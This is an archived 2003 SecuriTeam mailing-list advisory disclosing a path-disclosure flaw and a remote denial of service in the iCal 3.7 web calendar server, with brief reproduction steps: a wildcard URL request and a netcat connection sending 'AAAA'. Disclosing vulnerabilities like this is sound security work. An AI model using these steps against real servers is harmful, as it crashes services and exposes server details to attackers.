[NT] iCal Remote DoS and Path Disclosure

From: support@securiteam.com
Date: 01/05/03

  • Next message: support@securiteam.com: "[TOOL] ARP Promiscuous Node Detection" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 5 Jan 2003 12:03:00 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      iCal Remote DoS and Path Disclosure
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.brownbearsw.com> iCal is a web calendar server for the
    Microsoft Windows. It can be used to show meetings, events, or other
    schedules. Calendars can be viewed, edited, and administered totally
    through the web. iCal is built for thin-clients, so access calendar
    without any plug-ins or Java interpreters. Two vulnerabilities in the
    product allow remote attackers to reveal the true path used in the server,
    and to cause the server to crash.

    DETAILS

    Vulnerable systems:
     * iCal version 3.7

    Path disclosure:
    Accessing http//target/*
    Will return the following error message:
    Unable to write to D:\program files\iCl 3.7 Web Calendar\*.cal

    Denial of service:
    Connecting using "nc target 80" and then sending:
     AAAA
    [ And pressing enter ]

    Will return an error message:
    Access violation at address 00403d8b in module'ICAL.EXE' Read of address
    0161c1af

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:securma@caramail.com>
    securma massine.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages